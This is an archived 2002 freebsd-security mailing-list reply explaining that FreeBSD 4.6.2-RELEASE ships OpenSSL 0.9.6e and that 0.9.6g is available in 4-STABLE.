References: <000001c255f4$179c0fc0$0800a8c0@bebo> <200209062229.g86MTX3j042290@orthanc.ab.ca> <20020908033017.M92241@babayaga.neotext.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020908033017.M92241@babayaga.neotext.ca>; from freebsd@babayaga.neotext.ca on Sat, Sep 07, 2002 at 09:30:17PM -0600 Organization: Alameda Networks, Inc. X-Operating-System: FreeBSD 4.7-PRERELEASE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Sep 07, 2002 at 09:30:17PM -0600, Duncan Patton a Campbell is Dhu wrote: > I just installed a system from the net using 4.6.2-RELEASE > floppies and it installed openssl 9.6e, not g. > > Duncan Patton a Campbell is Duihb 0.9.6g was released after 4.6.2-RELEASE was done AFIK. From the 4.6.2-RELEASE notes: http://www.freebsd.org/releases/4.6.2R/relnotes-i386.html [4.6.2] OpenSSL has been updated to 0.9.6e. 4-STABLE (ie 4.7-PRERELEASE) has 0.9.6g now. -- Regards, Ulf. --------------------------------------------------------------------- Ulf Zimmermann, 1525 Pacific Ave., Alameda, CA-94501, #: 510-865-0204 You can find my resume at: http://seven.Alameda.net/~ulf/resume.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message